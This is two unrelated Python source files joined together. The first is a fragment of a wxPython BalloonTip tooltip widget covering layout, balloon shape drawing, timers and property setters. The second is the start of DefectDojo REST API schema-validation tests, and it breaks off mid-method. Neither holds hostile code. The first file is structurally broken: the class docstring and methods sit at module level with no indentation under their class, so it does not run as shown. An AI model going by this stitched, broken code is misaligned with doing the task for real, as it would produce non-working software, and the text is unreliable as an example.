        # Optional "X" close button (BT_BUTTON style) in the top-right.
        if self._tipstyle == BT_BUTTON:
            self._closebutton = GenButton(panel, -1, "X", style=wx.NO_BORDER)
            self._closebutton.SetMinSize((16,16))
            self._closebutton.SetFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False))
            self._closebutton.Bind(wx.EVT_ENTER_WINDOW, self.OnEnterButton)
            self._closebutton.Bind(wx.EVT_LEAVE_WINDOW, self.OnLeaveButton)
            self._closebutton.SetUseFocusIndicator(False)
            if self._toptitle != "":
                hsizer.Add(self._closebutton, 0, wx.TOP | wx.RIGHT, 5)
            else:
                hsizer.Add((10,0), 1, wx.EXPAND)
                hsizer.Add(self._closebutton, 0, wx.ALIGN_RIGHT | wx.TOP
                           | wx.RIGHT, 5)
        # Only add the header row when at least one header element exists.
        if self._topicon is not None or self._toptitle != "" \
           or self._tipstyle == BT_BUTTON:
            subsizer.Add(hsizer, 0, wx.EXPAND | wx.BOTTOM, 5)
        self._firstline = line = wx.StaticLine(panel, -1, style=wx.LI_HORIZONTAL)
        if self._topicon is not None or self._toptitle != "" \
           or self._tipstyle == BT_BUTTON:
            subsizer.Add(self._firstline, 0, wx.EXPAND | wx.LEFT | wx.RIGHT
                         | wx.BOTTOM, 10)
        else:
            subsizer.Add(self._firstline, 0, wx.EXPAND | wx.LEFT | wx.RIGHT
                         | wx.BOTTOM | wx.TOP, 10)
        # The tip message itself.
        mainstt = wx.StaticText(panel, -1, self._message)
        self._balloonmsg = mainstt
        self._balloonmsg.SetForegroundColour(self._balloonmsgcolour)
        self._balloonmsg.SetFont(self._balloonmsgfont)
        subsizer.Add(self._balloonmsg, 1, wx.EXPAND | wx.LEFT | wx.RIGHT |
                     wx.BOTTOM, 10)
        self._secondline = wx.StaticLine(panel, -1, style=wx.LI_HORIZONTAL)
        subsizer.Add(self._secondline, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
        subsizer.Add((0,0),1)
        panel.SetSizer(subsizer)
        sizer.Add(panel, 1, wx.EXPAND)
        self.SetSizerAndFit(sizer)
        sizer.Layout()
        # Wire up the destruction behaviour chosen by the BalloonTip.
        if self._tipstyle == BT_CLICK:
            if self._toptitle != "":
                self._balloontitle.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
            if self._topicon is not None:
                self._balloonbmp.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
            self._balloonmsg.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
            self.panel.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
        elif self._tipstyle == BT_BUTTON:
            self._closebutton.Bind(wx.EVT_BUTTON, self.OnClose)
        self.panel.SetBackgroundColour(self._ballooncolour)
        # On wxGTK the native window must exist before a shaped region can be
        # applied, so defer SetBalloonShape to the window-create event.
        if wx.Platform == "__WXGTK__":
            self.Bind(wx.EVT_WINDOW_CREATE, self.SetBalloonShape)
        else:
            self.SetBalloonShape()
        self.Show(True)
def SetBalloonShape(self, event=None):
    """
    Sets the balloon shape.

    Measures the message text, derives the balloon box geometry from the
    current mouse position, draws the balloon outline (body plus a pointer
    triangle) into a mask bitmap and applies it with ``SetShape``.

    :param `event`: on wxGTK, a `wx.WindowCreateEvent` event to process.
    """
    size = self.GetSize()
    pos = self.GetPosition()  # NOTE(review): unused — kept as-is
    # Measure the message extent to split the window height into the
    # text area and the remaining "box" used for the balloon body.
    dc = wx.MemoryDC(wx.EmptyBitmap(1,1))
    textlabel = self._balloonmsg.GetLabel()
    textfont = self._balloonmsg.GetFont()
    textextent = dc.GetFullTextExtent(textlabel, textfont)
    boxheight = size.y - textextent[1]*len(textlabel.split("\n"))
    boxwidth = size.x
    # Decide which corner of the balloon points at the mouse; the 20px
    # threshold keeps the balloon on-screen near the screen edges.
    position = wx.GetMousePosition()
    xpos = position[0]
    ypos = position[1]
    if xpos > 20 and ypos > 20:
        # This Is NW Positioning
        positioning = "NW"
        xpos = position[0] - boxwidth + 20
        ypos = position[1] - boxheight - 20
    elif xpos <= 20 and ypos <= 20:
        # This Is SE Positioning
        positioning = "SE"
        xpos = position[0] - 20
        ypos = position[1]
    elif xpos > 20 and ypos <= 20:
        # This Is SW Positioning
        positioning = "SW"
        xpos = position[0] - boxwidth + 20
        ypos = position[1]
    else:
        # This Is NE Positioning
        positioning = "NE"
        xpos = position[0]
        ypos = position[1] - boxheight + 20
    # Build the shape mask: black background; everything drawn in a
    # non-black colour becomes part of the window region below.
    bmp = wx.EmptyBitmap(size.x,size.y)
    dc = wx.BufferedDC(None, bmp)
    dc.BeginDrawing()
    dc.SetBackground(wx.Brush(wx.Colour(0,0,0), wx.SOLID))
    dc.Clear()
    dc.SetPen(wx.Pen(wx.Colour(0,0,0), 1, wx.TRANSPARENT))
    if self._shape == BT_ROUNDED:
        dc.DrawRoundedRectangle(0, 20, boxwidth, boxheight-20, 12)
    elif self._shape == BT_RECTANGLE:
        dc.DrawRectangle(0, 20, boxwidth, boxheight-20)
    # Pointer triangle, one orientation per corner placement.
    if positioning == "NW":
        dc.DrawPolygon(((boxwidth-40, boxheight), (boxwidth-20, boxheight+20),
                        (boxwidth-20, boxheight)))
    elif positioning == "SE":
        dc.DrawPolygon(((20, 20), (20, 0), (40, 20)))
    elif positioning == "SW":
        dc.DrawPolygon(((boxwidth-40, 20), (boxwidth-20, 0), (boxwidth-20, 20)))
    else:
        dc.DrawPolygon(((20, boxheight), (20, boxheight+20), (40, boxheight)))
    dc.EndDrawing()
    # wx 2.8-era API: region is everything differing from the given colour.
    r = wx.RegionFromBitmapColour(bmp, wx.Colour(0,0,0))
    self.hasShape = self.SetShape(r)
    if self._tipstyle == BT_BUTTON:
        colour = self.panel.GetBackgroundColour()
        self._closebutton.SetBackgroundColour(colour)
    self.SetPosition((xpos, ypos))
def OnEnterButton(self, event):
    """
    Handles the ``wx.EVT_ENTER_WINDOW`` for the L{BalloonTip} button.

    When the L{BalloonTip} is created with `tipstyle` = ``BT_BUTTON``, the
    button is shaded darker while hovered, giving a 3D-like effect.

    :param `event`: a `wx.MouseEvent` event to be processed.
    """
    def darken(channel):
        # Darken by 30, but leave channels below 30 untouched so the
        # result never goes negative.
        return channel - 30 if channel >= 30 else channel

    button = event.GetEventObject()
    base = button.GetBackgroundColour()
    shaded = wx.Colour(darken(base.Red()), darken(base.Green()), darken(base.Blue()))
    button.SetBackgroundColour(shaded)
    button.SetForegroundColour(wx.WHITE)
    button.Refresh()
    event.Skip()
def OnLeaveButton(self, event):
    """
    Handles the ``wx.EVT_LEAVE_WINDOW`` for the L{BalloonTip} button.

    When the L{BalloonTip} is created with `tipstyle` = ``BT_BUTTON``, this
    restores the button's normal colours once the mouse leaves it.

    :param `event`: a `wx.MouseEvent` event to be processed.
    """
    button = event.GetEventObject()
    button.SetBackgroundColour(self.panel.GetBackgroundColour())
    button.SetForegroundColour(wx.BLACK)
    button.Refresh()
    event.Skip()
def OnClose(self, event):
    """
    Destroys the balloon frame. Bound to the close button (``wx.EVT_BUTTON``)
    or, for the ``BT_CLICK`` style, to left clicks on the balloon widgets.

    :param `event`: the triggering event.
    """
    # For taskbar targets, reset the parent's creation flag and stop the
    # position-watch timer before tearing the frame down.
    if isinstance(self._parent._widget, wx.TaskBarIcon):
        self._parent.taskbarcreation = 0
        self._parent.taskbartime.Stop()
        del self._parent.taskbartime
        del self._parent.BalloonFrame
    self.Destroy()
# ---------------------------------------------------------------
# Class BalloonTip
# ---------------------------------------------------------------
# This Is The Main BalloonTip Implementation
# ---------------------------------------------------------------
class BalloonTip(object):
"""
BalloonTip is a class that allows you to display tooltips in a balloon style
window.
This is the main class implementation.
"""
def __init__(self, topicon=None, toptitle="",
             message="", shape=BT_ROUNDED, tipstyle=BT_LEAVE):
    """
    Default class constructor.

    :param `topicon`: bitmap shown in the balloon's top-left corner, or ``None``;
    :param `toptitle`: title shown at the top of the balloon ("" for no title);
    :param `message`: the tip message; it can not be empty;
    :param `shape`: ``BT_ROUNDED`` or ``BT_RECTANGLE``;
    :param `tipstyle`: ``BT_LEAVE``, ``BT_CLICK`` or ``BT_BUTTON`` — controls
     how the balloon is dismissed.
    """
    self._shape = shape
    self._topicon = topicon
    self._toptitle = toptitle
    self._message = message
    self._tipstyle = tipstyle
    self._runningapp = wx.GetApp()
    # Global flag consulted by OnWidgetEnter before showing a balloon.
    self._runningapp.__tooltipenabled__ = True
    if self._message == "":
        raise Exception("\nERROR: You Should At Least Set The Message For The BalloonTip")
    if self._shape not in (BT_ROUNDED, BT_RECTANGLE):
        raise Exception('\nERROR: BalloonTip Shape Should Be One Of "BT_ROUNDED", "BT_RECTANGLE"')
    if self._tipstyle not in (BT_LEAVE, BT_CLICK, BT_BUTTON):
        raise Exception('\nERROR: BalloonTip TipStyle Should Be One Of "BT_LEAVE", "BT_CLICK", "BT_BUTTON"')
    # Install defaults for timing, colours and fonts.
    self.SetStartDelay()
    self.SetEndDelay()
    self.SetBalloonColour()
    if toptitle != "":
        self.SetTitleFont()
        self.SetTitleColour()
    if topicon is not None:
        self.SetBalloonIcon(topicon)
    self.SetMessageFont()
    self.SetMessageColour()
def SetTarget(self, widget):
    """
    Sets the target control/window for the BalloonTip.

    :param `widget`: an instance of `wx.Window` (or a `wx.TaskBarIcon`).
    """
    self._widget = widget
    if isinstance(widget, wx.TaskBarIcon):
        self.taskbarcreation = 0
        widget.Bind(wx.EVT_TASKBAR_MOVE, self.OnTaskBarMove)
        widget.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroy)
    else:
        for evt, handler in ((wx.EVT_ENTER_WINDOW, self.OnWidgetEnter),
                             (wx.EVT_LEAVE_WINDOW, self.OnWidgetLeave),
                             (wx.EVT_MOTION, self.OnWidgetMotion),
                             (wx.EVT_WINDOW_DESTROY, self.OnDestroy)):
            widget.Bind(evt, handler)
def GetTarget(self):
    """ Returns the target window for the L{BalloonTip}."""
    try:
        return self._widget
    except AttributeError:
        raise Exception("\nERROR: BalloonTip Target Has Not Been Set")
def SetStartDelay(self, delay=1):
    """
    Sets the delay time after which the L{BalloonTip} is created.

    :param `delay`: the number of milliseconds after which L{BalloonTip} is created.
    """
    if delay >= 1:
        self._startdelaytime = float(delay)
    else:
        raise Exception("\nERROR: Delay Time For BalloonTip Creation Should Be Greater Than 1 ms")
def GetStartDelay(self):
    """ Returns the delay time, in milliseconds, after which the L{BalloonTip} is created."""
    return self._startdelaytime
def SetEndDelay(self, delay=1e6):
    """
    Sets the delay time after which the BalloonTip is destroyed.

    :param `delay`: the number of milliseconds after which L{BalloonTip} is destroyed.
    """
    if delay >= 1:
        self._enddelaytime = float(delay)
    else:
        raise Exception("\nERROR: Delay Time For BalloonTip Destruction Should Be Greater Than 1 ms")
def GetEndDelay(self):
    """ Returns the delay time, in milliseconds, after which the L{BalloonTip} is destroyed."""
    return self._enddelaytime
def OnWidgetEnter(self, event):
    """
    Handles the ``wx.EVT_ENTER_WINDOW`` for the target control/window and
    arms the creation timer for the L{BalloonTip}.

    :param `event`: a `wx.MouseEvent` event to be processed.
    """
    if getattr(self, "BalloonFrame", None):
        # A balloon is already on screen; nothing to do.
        return
    if not self._runningapp.__tooltipenabled__:
        # Balloon tips are globally disabled.
        return
    self.showtime = wx.PyTimer(self.NotifyTimer)
    self.showtime.Start(self._startdelaytime)
    event.Skip()
def OnWidgetLeave(self, event):
    """
    Handles the ``wx.EVT_LEAVE_WINDOW`` for the target control/window.

    :param `event`: a `wx.MouseEvent` event to be processed.

    :note: If the BalloonTip `tipstyle` is set to ``BT_LEAVE``, the L{BalloonTip} is destroyed.
    """
    # Cancel a pending creation timer so the balloon is not shown after
    # the mouse has already left the target.
    if hasattr(self, "showtime"):
        if self.showtime:
            self.showtime.Stop()
            del self.showtime
    if hasattr(self, "BalloonFrame"):
        if self.BalloonFrame:
            if self._tipstyle == BT_LEAVE:
                endtime = time.time()
                # Debounce: only destroy when the balloon has been visible
                # for more than 0.1s, surviving spurious leave events.
                if endtime - self.starttime > 0.1:
                    try:
                        self.BalloonFrame.Destroy()
                    except:
                        pass
                else:
                    event.Skip()
            # NOTE(review): for other tip styles the event is deliberately
            # not skipped while a balloon is visible.
        else:
            event.Skip()
    else:
        event.Skip()
def OnTaskBarMove(self, event):
    """
    Handles the mouse motion inside the taskbar icon area.

    :param `event`: a `wx.MouseEvent` event to be processed.
    """
    if not hasattr(self, "BalloonFrame"):
        if self.taskbarcreation == 0:
            # First motion after entering the icon: remember where the
            # mouse was and start both the position-watch timer and the
            # balloon-creation timer.
            self.mousepos = wx.GetMousePosition()
            self.currentmousepos = self.mousepos
            self.taskbartime = wx.PyTimer(self.TaskBarTimer)
            self.taskbartime.Start(100)
            self.showtime = wx.PyTimer(self.NotifyTimer)
            self.showtime.Start(self._startdelaytime)
        if self.taskbarcreation == 0:
            self.taskbarcreation = 1
        return
    event.Skip()
def OnWidgetMotion(self, event):
    """
    Handle the mouse motion inside the target.

    Restarts the creation timer on every motion event, so the balloon only
    appears once the pointer has been still for the start-delay interval.
    """
    if getattr(self, "BalloonFrame", None):
        return
    timer = getattr(self, "showtime", None)
    if timer:
        timer.Start(self._startdelaytime)
    event.Skip()
def NotifyTimer(self):
    """ The creation timer has expired. Creates the L{BalloonTip} frame."""
    self.BalloonFrame = BalloonFrame(self._widget, classparent=self)
    self.BalloonFrame.Show(True)
    self.starttime = time.time()  # consulted by OnWidgetLeave's debounce
    # One-shot: drop the creation timer, then arm the destruction timer.
    self.showtime.Stop()
    del self.showtime
    self.destroytime = wx.PyTimer(self.DestroyTimer)
    self.destroytime.Start(self._enddelaytime)
def TaskBarTimer(self):
    """
    This timer check periodically the mouse position.

    If the current mouse position is sufficiently far from the coordinates
    it had when entered the taskbar icon and the L{BalloonTip} style is
    ``BT_LEAVE``, the L{BalloonTip} frame is destroyed.
    """
    self.currentmousepos = wx.GetMousePosition()
    mousepos = self.mousepos
    # More than 30px away in either direction counts as having left.
    if abs(self.currentmousepos[0] - mousepos[0]) > 30 or \
       abs(self.currentmousepos[1] - mousepos[1]) > 30:
        if hasattr(self, "BalloonFrame"):
            if self._tipstyle == BT_LEAVE:
                try:
                    self.BalloonFrame.Destroy()
                    self.taskbartime.Stop()
                    del self.taskbartime
                    del self.BalloonFrame
                    self.taskbarcreation = 0
                except:
                    # Frame may already be gone; retry on the next tick.
                    pass
def DestroyTimer(self):
    """ The destruction timer has expired. Destroys the L{BalloonTip} frame."""
    self.destroytime.Stop()
    del self.destroytime
    try:
        self.BalloonFrame.Destroy()
    except:
        # The frame may already have been destroyed (e.g. by a leave event).
        pass
def SetBalloonShape(self, shape=BT_ROUNDED):
    """
    Sets the L{BalloonTip} frame shape.

    :param `shape`: should be one of ``BT_ROUNDED`` or ``BT_RECTANGLE``.
    """
    if shape in (BT_ROUNDED, BT_RECTANGLE):
        self._shape = shape
    else:
        raise Exception('\nERROR: BalloonTip Shape Should Be One Of "BT_ROUNDED", "BT_RECTANGLE"')
def GetBalloonShape(self):
    """ Returns the L{BalloonTip} frame shape (``BT_ROUNDED`` or ``BT_RECTANGLE``)."""
    return self._shape
def SetBalloonIcon(self, icon):
    """
    Sets the L{BalloonTip} top-left icon.

    :param `icon`: an instance of `wx.Bitmap`.
    """
    # icon.Ok() is the wx 2.8 spelling of IsOk(); kept for compatibility.
    if not icon.Ok():
        raise Exception("\nERROR: Invalid Image Passed To BalloonTip")
    self._topicon = icon
def GetBalloonIcon(self):
    """ Returns the L{BalloonTip} top-left icon (a `wx.Bitmap`, or ``None``)."""
    return self._topicon
def SetBalloonTitle(self, title=""):
    """
    Sets the L{BalloonTip} top title.

    :param `title`: a string to use as a L{BalloonTip} title; may be empty.
    """
    self._toptitle = title
def GetBalloonTitle(self):
    """ Returns the L{BalloonTip} top title string."""
    return self._toptitle
def SetBalloonMessage(self, message):
    """
    Sets the L{BalloonTip} tip message; it must be non-blank.

    :param `message`: a string identifying the main message body of L{BalloonTip}.
    """
    if not message.strip():
        raise Exception("\nERROR: BalloonTip Message Can Not Be Empty")
    self._message = message
def GetBalloonMessage(self):
    """ Returns the L{BalloonTip} tip message string."""
    return self._message
def SetBalloonTipStyle(self, tipstyle=BT_LEAVE):
    """
    Sets the L{BalloonTip} `tipstyle` parameter.

    :param `tipstyle`: one of ``BT_LEAVE`` (destroy when the mouse leaves
     the target), ``BT_CLICK`` (destroy when the balloon is clicked) or
     ``BT_BUTTON`` (destroy via the close button).
    """
    if tipstyle in (BT_LEAVE, BT_CLICK, BT_BUTTON):
        self._tipstyle = tipstyle
    else:
        raise Exception('\nERROR: BalloonTip TipStyle Should Be One Of "BT_LEAVE", "BT_CLICK", "BT_BUTTON"')
def GetBalloonTipStyle(self):
    """
    Returns the L{BalloonTip} `tipstyle` parameter.

    :see: L{SetBalloonTipStyle}
    """
    return self._tipstyle
def SetBalloonColour(self, colour=None):
    """
    Sets the L{BalloonTip} background colour.

    :param `colour`: a valid `wx.Colour` instance; defaults to a pale yellow.
    """
    self._ballooncolour = wx.Colour(255, 250, 205) if colour is None else colour
def GetBalloonColour(self):
    """ Returns the L{BalloonTip} background colour (a `wx.Colour`)."""
    return self._ballooncolour
def SetTitleFont(self, font=None):
    """
    Sets the font for the top title.

    :param `font`: a valid `wx.Font` instance; defaults to a 9pt bold Swiss font.
    """
    self._balloontitlefont = font if font is not None else wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False)
def GetTitleFont(self):
    """ Returns the font for the top title (a `wx.Font`)."""
    return self._balloontitlefont
def SetMessageFont(self, font=None):
    """
    Sets the font for the tip message.

    :param `font`: a valid `wx.Font` instance; defaults to an 8pt Swiss font.
    """
    self._balloonmsgfont = font if font is not None else wx.Font(8, wx.SWISS, wx.NORMAL, wx.NORMAL, False)
def GetMessageFont(self):
    """ Returns the font for the tip message (a `wx.Font`)."""
    return self._balloonmsgfont
def SetTitleColour(self, colour=None):
    """
    Sets the colour for the top title.

    :param `colour`: a valid `wx.Colour` instance; defaults to black.
    """
    self._balloontitlecolour = wx.BLACK if colour is None else colour
def GetTitleColour(self):
    """ Returns the colour for the top title (a `wx.Colour`)."""
    return self._balloontitlecolour
def SetMessageColour(self, colour=None):
    """
    Sets the colour for the tip message.

    :param `colour`: a valid `wx.Colour` instance; defaults to black.
    """
    self._balloonmsgcolour = wx.BLACK if colour is None else colour
def GetMessageColour(self):
    """ Returns the colour for the tip message (a `wx.Colour`)."""
    return self._balloonmsgcolour
def OnDestroy(self, event):
    """
    Handles the target destruction, specifically handling the ``wx.EVT_WINDOW_DESTROY``
    event.

    :param `event`: a `wx.WindowDestroyEvent` event to be processed.
    """
    if hasattr(self, "BalloonFrame"):
        if self.BalloonFrame:
            try:
                # Unbind everything installed by SetTarget so no handler
                # fires against the dying widget; best-effort only.
                if isinstance(self._widget, wx.TaskBarIcon):
                    self._widget.Unbind(wx.EVT_TASKBAR_MOVE)
                    self.taskbartime.Stop()
                    del self.taskbartime
                else:
                    self._widget.Unbind(wx.EVT_MOTION)
                    self._widget.Unbind(wx.EVT_LEAVE_WINDOW)
                    self._widget.Unbind(wx.EVT_ENTER_WINDOW)
                self.BalloonFrame.Destroy()
            except:
                # Widget may already be half-destroyed; ignore.
                pass
            del self.BalloonFrame
def EnableTip(self, enable=True):
    """
    Enable/disable globally the L{BalloonTip}.

    :param `enable`: ``True`` to enable L{BalloonTip}, ``False`` otherwise.
    """
    # Flag consulted by OnWidgetEnter before arming the creation timer.
    self._runningapp.__tooltipenabled__ = enable
| |
from django.test import tag
from rest_framework.test import APIRequestFactory
from rest_framework.views import APIView
from rest_framework.test import APITestCase, force_authenticate, APIClient
from rest_framework.mixins import \
RetrieveModelMixin, ListModelMixin, CreateModelMixin, UpdateModelMixin
from rest_framework import status
from drf_yasg.generators import OpenAPISchemaGenerator
from drf_yasg.openapi import Info, SchemaRef
from drf_yasg.openapi import \
TYPE_ARRAY, TYPE_BOOLEAN, TYPE_INTEGER, TYPE_NUMBER, TYPE_OBJECT, TYPE_STRING
from collections import OrderedDict
from dojo.api_v2.views import \
DevelopmentEnvironmentViewSet, EndpointStatusViewSet, EndPointViewSet, \
EngagementViewSet, FindingTemplatesViewSet, FindingViewSet, \
JiraInstanceViewSet, DojoMetaViewSet, NoteTypeViewSet, NotesViewSet, \
ProductTypeViewSet, ProductViewSet, RegulationsViewSet, \
SonarqubeIssueViewSet, SonarqubeProductViewSet, \
SonarqubeIssueTransitionViewSet, StubFindingsViewSet, SystemSettingsViewSet, \
TestTypesViewSet, TestsViewSet, ToolConfigurationsViewSet, ToolProductSettingsViewSet, \
ToolTypesViewSet, UsersViewSet, JiraIssuesViewSet, JiraProjectViewSet, AppAnalysisViewSet, \
LanguageTypeViewSet, LanguageViewSet
from dojo.models import \
Development_Environment, Endpoint_Status, Endpoint, Engagement, Finding_Template, \
Finding, JIRA_Instance, JIRA_Issue, DojoMeta, Note_Type, Notes, Product_Type, Product, Regulation, \
Sonarqube_Issue, Sonarqube_Product, Sonarqube_Issue_Transition, \
Stub_Finding, System_Settings, Test_Type, Test, Tool_Configuration, Tool_Product_Settings, \
Tool_Type, Dojo_User, JIRA_Project, App_Analysis, Language_Type, Languages
from dojo.api_v2.serializers import \
DevelopmentEnvironmentSerializer, EndpointStatusSerializer, EndpointSerializer, \
EngagementSerializer, FindingTemplateSerializer, FindingSerializer, \
JIRAInstanceSerializer, JIRAIssueSerializer, JIRAProjectSerializer, MetaSerializer, NoteTypeSerializer, \
ProductSerializer, RegulationSerializer, \
SonarqubeIssueSerializer, SonarqubeProductSerializer, SonarqubeIssueTransitionSerializer, \
StubFindingSerializer, SystemSettingsSerializer, TestTypeSerializer, TestSerializer, ToolConfigurationSerializer, \
ToolProductSettingsSerializer, ToolTypeSerializer, UserSerializer, NoteSerializer, ProductTypeSerializer, \
AppAnalysisSerializer, LanguageTypeSerializer, LanguageSerializer
# Generator used to build the Swagger (OpenAPI v2) schema the tests validate against.
SWAGGER_SCHEMA_GENERATOR = OpenAPISchemaGenerator(Info("defectdojo", "v2"))
# Common prefix for every endpoint exercised by these tests.
BASE_API_URL = "/api/v2"
def testIsBroken(method):
    """Tag *method* as 'broken' so it can be excluded from test runs."""
    broken = tag("broken")
    return broken(method)
def skipIfNotSubclass(baseclass):
    """Decorator factory: skip the decorated test method unless the test's
    ``viewset`` is a subclass of *baseclass*.

    Uses ``functools.wraps`` so the wrapped method keeps its name/docstring,
    which keeps unittest/pytest reporting and test selection accurate.
    """
    def decorate(f):
        from functools import wraps

        @wraps(f)
        def wrapper(self, *args, **kwargs):
            if not issubclass(self.viewset, baseclass):
                self.skipTest('This view is not %s' % baseclass)
            else:
                f(self, *args, **kwargs)
        return wrapper
    return decorate
def check_response_valid(expected_code, response):
    """Assert that *response* carries *expected_code*, with a diagnostic message."""
    payload = getattr(response, "data", None)
    message = (
        f"Response invalid, returned with code {response.status_code}"
        f"\nResponse Data:\n{payload}"
    )
    assert response.status_code == expected_code, message
def format_url(path):
    """Prefix *path* with the versioned API base URL."""
    return BASE_API_URL + path
class SchemaChecker():
    """
    Walks an API response body and verifies it against a Swagger
    (OpenAPI v2) schema: value types, required properties, nested
    objects/arrays, ``additionalProperties`` and unexpected keys.

    Errors are accumulated during the walk and reported together by
    ``check()`` so one run surfaces every mismatch.

    Fix: schema-type comparisons now use ``==`` instead of ``is``. The
    TYPE_* constants are strings; ``is`` only worked by object identity
    and would silently break for schemas not built from the very same
    constant objects (e.g. loaded from JSON).
    """
    def __init__(self, definitions):
        self._prefix = []
        self._has_failed = False
        self._definitions = definitions
        self._errors = []

    def _register_error(self, error):
        self._errors += [error]

    def _check_or_fail(self, condition, message):
        # Record the failure but keep walking so one run reports all errors.
        if not condition:
            self._has_failed = True
            self._register_error(message)

    def _get_prefix(self):
        # Human-readable path to the value currently being checked.
        return '#'.join(self._prefix)

    def _push_prefix(self, prefix):
        self._prefix += [prefix]

    def _pop_prefix(self):
        self._prefix = self._prefix if len(self._prefix) == 0 else self._prefix[:-1]

    def _resolve_if_ref(self, schema):
        # Follow "$ref": "#/definitions/<Name>" indirections.
        if type(schema) is not SchemaRef:
            return schema
        ref_name = schema["$ref"]
        ref_name = ref_name[ref_name.rfind("/") + 1:]
        return self._definitions[ref_name]

    def _check_has_required_fields(self, required_fields, obj):
        for required_field in required_fields:
            # passwords are writeOnly, but this is not supported by Swagger / OpenAPIv2
            if required_field != 'password':
                field = f"{self._get_prefix()}#{required_field}"
                self._check_or_fail(obj is not None and required_field in obj, f"{field} is required but was not returned")

    def _check_type(self, schema, obj):
        schema_type = schema["type"]
        # readOnly fields may legitimately be absent/null in request echoes.
        is_nullable = schema.get("x-nullable", False) or schema.get("readOnly", False)

        def _check_helper(check):
            self._check_or_fail(check, f"{self._get_prefix()} should be of type {schema_type} but value was of type {type(obj)}")

        if obj is None:
            self._check_or_fail(is_nullable, f"{self._get_prefix()} is not nullable yet the value returned was null")
        elif schema_type == TYPE_BOOLEAN:
            _check_helper(isinstance(obj, bool))
        elif schema_type == TYPE_INTEGER:
            _check_helper(isinstance(obj, int))
        elif schema_type == TYPE_NUMBER:
            # NOTE(review): assumes numbers arrive serialized as decimal
            # strings; an int/float here would raise AttributeError, and
            # "1.5".isdecimal() is False — confirm against the API output.
            _check_helper(obj.isdecimal())
        elif schema_type == TYPE_ARRAY:
            _check_helper(isinstance(obj, list))
        elif schema_type == TYPE_OBJECT:
            _check_helper(isinstance(obj, OrderedDict) or isinstance(obj, dict))
        elif schema_type == TYPE_STRING:
            _check_helper(isinstance(obj, str))
        else:
            # Default case
            _check_helper(False)

    def _with_prefix(self, prefix, callable, *args):
        self._push_prefix(prefix)
        callable(*args)
        self._pop_prefix()

    def check(self, schema, obj):
        """Validate *obj* against *schema*; raises AssertionError listing all errors."""
        def _check(schema, obj):
            schema = self._resolve_if_ref(schema)
            self._check_type(schema, obj)

            required_fields = schema.get("required", [])
            self._check_has_required_fields(required_fields, obj)

            if obj is None:
                return

            properties = schema.get("properties", None)
            if properties is not None:
                for name, prop in properties.items():
                    obj_child = obj.get(name, None)
                    if obj_child is not None:
                        self._with_prefix(name, _check, prop, obj_child)

                for child_name in obj.keys():
                    # TODO prefetch mixins not picked up by spectcular?
                    if child_name not in ['prefetch']:
                        if not properties or child_name not in properties.keys():
                            self._has_failed = True
                            self._register_error(f'unexpected property "{child_name}" found')

            additional_properties = schema.get("additionalProperties", None)
            if additional_properties is not None:
                for name, obj_child in obj.items():
                    self._with_prefix(f"additionalProp<{name}>", _check, additional_properties, obj_child)

            if schema["type"] == TYPE_ARRAY:
                items_schema = schema["items"]
                for index in range(len(obj)):
                    self._with_prefix(f"item{index}", _check, items_schema, obj[index])

        # Reset state so the checker instance can be reused across calls.
        self._has_failed = False
        self._errors = []
        self._prefix = []
        _check(schema, obj)
        assert not self._has_failed, "\n" + '\n'.join(self._errors) + "\nFailed with " + str(len(self._errors)) + " errors"
class BaseClass():
    class SchemaTest(APITestCase):
        """
        Base for the per-endpoint schema tests: performs live API calls and
        checks the responses against the generated Swagger (OpenAPI v2)
        schema. Subclasses set ``viewname``/``viewset``/``model``/``serializer``
        (and optionally ``field_transformers``) in ``__init__``.

        Fix: ``extra_data`` defaults were mutable (``{}`` / ``[]``) — a classic
        shared-mutable-default hazard; they are now ``None`` sentinels.
        """
        fixtures = ['dojo_testdata.json']

        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            # Filled in by subclasses.
            self.viewset = None
            self.viewname = None
            self.model = None
            self.serializer = None
            # Optional per-field callables applied to serialized data before
            # it is re-submitted (e.g. to avoid uniqueness collisions).
            self.field_transformers = dict()

        def setUp(self):
            super().setUp()
            testuser = Dojo_User.objects.get(username='admin')

            factory = APIRequestFactory()
            request = factory.get('/')
            force_authenticate(request, user=testuser)
            request = APIView().initialize_request(request)
            # Generate the schema via an authenticated request so all
            # endpoints are included.
            self.schema = SWAGGER_SCHEMA_GENERATOR.get_schema(request, public=True)

            self.client = APIClient()
            self.client.force_authenticate(user=testuser)

        def check_schema(self, schema, obj):
            """Assert that *obj* conforms to *schema*."""
            schema_checker = SchemaChecker(self.schema["definitions"])
            schema_checker.check(schema, obj)

        def get_valid_object_id(self):
            """Return the id of the first listed object, or ``None`` if none exist."""
            response = self.client.get(format_url(f"/{self.viewname}/"))
            check_response_valid(status.HTTP_200_OK, response)
            if len(response.data["results"]) == 0:
                return None
            return response.data["results"][0].get('id', None)

        def get_endpoint_schema(self, path, method):
            """Return the schema of *method* on *path*, failing loudly if absent."""
            paths = self.schema["paths"]
            methods = paths.get(path, None)
            assert methods is not None, f"{path} not found in {[path for path in paths.keys()]}"
            endpoint = methods.get(method, None)
            assert endpoint is not None, f"Method {method} not found in {[method for method in methods.keys()]}"
            return endpoint

        def construct_response_data(self, obj_id):
            """Serialize the object with *obj_id* and apply the field transformers."""
            obj = self.model.objects.get(id=obj_id)
            request = APIView().initialize_request(APIRequestFactory().request())
            serialized_obj = self.serializer(context={"request": request}).to_representation(obj)
            for name, transformer in self.field_transformers.items():
                serialized_obj[name] = transformer(serialized_obj[name])
            return serialized_obj

        @skipIfNotSubclass(ListModelMixin)
        def test_list_endpoint(self, extra_args=None):
            endpoints = self.schema["paths"][f"/{self.viewname}/"]
            response = self.client.get(format_url(f"/{self.viewname}/"), extra_args)
            check_response_valid(status.HTTP_200_OK, response)
            schema = endpoints['get']['responses']['200']['schema']
            obj = response.data
            self.check_schema(schema, obj)

        @skipIfNotSubclass(RetrieveModelMixin)
        def test_retrieve_endpoint(self, extra_args=None):
            endpoints = self.schema["paths"][f"/{self.viewname}/{{id}}/"]
            response = self.client.get(format_url(f"/{self.viewname}/"))
            check_response_valid(status.HTTP_200_OK, response)
            ids = [obj['id'] for obj in response.data["results"]]
